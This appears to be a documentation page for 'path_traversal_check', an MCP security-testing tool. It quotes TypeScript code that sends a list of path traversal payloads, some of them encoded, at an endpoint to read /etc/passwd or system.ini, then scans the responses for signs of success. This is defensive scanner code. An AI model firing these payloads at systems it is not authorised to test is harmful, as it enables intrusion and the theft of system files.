path_traversal_check
Detect and prevent path traversal vulnerabilities in API endpoints by testing specific parameters for unauthorized access. Works with GET or POST methods and integrates authentication checks.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| endpoint | Yes | API endpoint to test | |
| http_method | No | HTTP method to use | GET |
| parameter_name | Yes | Name of the parameter to test for path traversal | |
| use_auth | No | Whether to use current authentication if available |
Implementation Reference
- src/tools/dataLeakage.ts:121-182 (handler)The core handler function executing the path traversal vulnerability check by injecting traversal payloads into requests and analyzing responses for success indicators.async ({ endpoint, parameter_name, http_method, use_auth }) => { // Path traversal payloads const traversalPayloads = [ "../../../etc/passwd", "..\\..\\..\\Windows\\system.ini", "....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", "..%252f..%252f..%252fetc%252fpasswd", "/etc/passwd", "C:\\Windows\\system.ini", "file:///etc/passwd", "/dev/null", "../../../../../../../../../../../../../../../../etc/hosts", ]; const results = []; try { for (const payload of traversalPayloads) { const response = await makeRequest(endpoint, parameter_name, payload, http_method, use_auth); const responseBody = typeof response.data === 'string' ? response.data : JSON.stringify(response.data); // Check for signs of successful directory traversal const suspicious = checkForTraversalSuccess(responseBody, payload); results.push({ payload, status: response.status, size: responseBody.length, suspicious, notes: suspicious ? "Possible directory traversal vulnerability" : "No clear signs of vulnerability", }); } // Add authentication info to the report const authManager = AuthManager.getInstance(); const authState = authManager.getAuthState(); const authInfo = use_auth && authState.type !== 'none' ? `\nTests performed with authentication: ${authState.type}` : '\nTests performed without authentication'; return { content: [ { type: "text", text: `Path Traversal Test Results for ${endpoint} (parameter: ${parameter_name})${authInfo}\n\n${results.map(r => `Payload: ${r.payload}\nStatus: ${r.status}\nResponse Size: ${r.size}\nSuspicious: ${r.suspicious}\nNotes: ${r.notes}\n\n` ).join('')}`, }, ], }; } catch (error) { return { content: [ { type: "text", text: `Error testing for path traversal: ${(error as Error).message}`, }, ], }; } }
- src/tools/dataLeakage.ts:115-120 (schema)Zod input schema defining parameters: endpoint, parameter_name, http_method, use_auth.{ endpoint: z.string().url().describe("API endpoint to test"), parameter_name: z.string().describe("Name of the parameter to test for path traversal"), http_method: z.enum(["GET", "POST"]).default("GET").describe("HTTP method to use"), use_auth: z.boolean().default(true).describe("Whether to use current authentication if available"), },
- src/tools/dataLeakage.ts:113-183 (registration)Direct registration of the path_traversal_check tool on the MCP server using server.tool(), including schema and handler.server.tool( "path_traversal_check", { endpoint: z.string().url().describe("API endpoint to test"), parameter_name: z.string().describe("Name of the parameter to test for path traversal"), http_method: z.enum(["GET", "POST"]).default("GET").describe("HTTP method to use"), use_auth: z.boolean().default(true).describe("Whether to use current authentication if available"), }, async ({ endpoint, parameter_name, http_method, use_auth }) => { // Path traversal payloads const traversalPayloads = [ "../../../etc/passwd", "..\\..\\..\\Windows\\system.ini", "....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", "..%252f..%252f..%252fetc%252fpasswd", "/etc/passwd", "C:\\Windows\\system.ini", "file:///etc/passwd", "/dev/null", "../../../../../../../../../../../../../../../../etc/hosts", ]; const results = []; try { for (const payload of traversalPayloads) { const response = await makeRequest(endpoint, parameter_name, payload, http_method, use_auth); const responseBody = typeof response.data === 'string' ? response.data : JSON.stringify(response.data); // Check for signs of successful directory traversal const suspicious = checkForTraversalSuccess(responseBody, payload); results.push({ payload, status: response.status, size: responseBody.length, suspicious, notes: suspicious ? "Possible directory traversal vulnerability" : "No clear signs of vulnerability", }); } // Add authentication info to the report const authManager = AuthManager.getInstance(); const authState = authManager.getAuthState(); const authInfo = use_auth && authState.type !== 'none' ? `\nTests performed with authentication: ${authState.type}` : '\nTests performed without authentication'; return { content: [ { type: "text", text: `Path Traversal Test Results for ${endpoint} (parameter: ${parameter_name})${authInfo}\n\n${results.map(r => `Payload: ${r.payload}\nStatus: ${r.status}\nResponse Size: ${r.size}\nSuspicious: ${r.suspicious}\nNotes: ${r.notes}\n\n` ).join('')}`, }, ], }; } catch (error) { return { content: [ { type: "text", text: `Error testing for path traversal: ${(error as Error).message}`, }, ], }; } } );
- src/tools/dataLeakage.ts:189-223 (helper)Helper function used by the handler to construct and send HTTP requests with injected path traversal payloads.async function makeRequest(endpoint: string, paramName: string, paramValue: string, method: string, useAuth: boolean = true) { // Prepare the request configuration const config: any = { method: method.toLowerCase(), url: endpoint, validateStatus: () => true, // Accept any status code }; // Add authentication headers if available and requested if (useAuth) { const authManager = AuthManager.getInstance(); const authState = authManager.getAuthState(); if (authState.type !== 'none' && authState.headers) { config.headers = { ...config.headers, ...authState.headers }; } } // Add the parameter based on the HTTP method if (method === "GET") { // For GET requests, add as query parameter const url = new URL(endpoint); url.searchParams.set(paramName, paramValue); config.url = url.toString(); } else { // For POST requests, add in the body config.data = { [paramName]: paramValue }; config.headers = { ...config.headers, "Content-Type": "application/json", }; } return await axios(config); }
- src/tools/dataLeakage.ts:375-407 (helper)Helper function used by the handler to detect signs of successful directory traversal in response bodies.function checkForTraversalSuccess(responseBody: string, payload: string): boolean { // Signs that might indicate successful path traversal const unixSigns = [ "root:x:", "bin:x:", "/home/", "/usr/", "Permission denied", "No such file or directory", ]; const windowsSigns = [ "[boot loader]", "[fonts]", "for 16-bit app support", "MSDOS.SYS", "files=", "Access is denied", ]; // Check based on payload type if (payload.includes("etc/passwd") || payload.includes("/dev/")) { return unixSigns.some(sign => responseBody.includes(sign)); } else if (payload.includes("Windows") || payload.includes("system.ini")) { return windowsSigns.some(sign => responseBody.includes(sign)); } // Generic suspicious content that might indicate successful traversal return ( (responseBody.includes("/") && responseBody.includes(":") && responseBody.includes("root")) || (responseBody.includes("\\") && responseBody.includes(":") && responseBody.includes("Windows")) ); }
- src/tools/index.ts:15-15 (registration)Higher-level registration call within registerSecurityTools that invokes the dataLeakage module registration, including path_traversal_check.registerDataLeakageTools(server);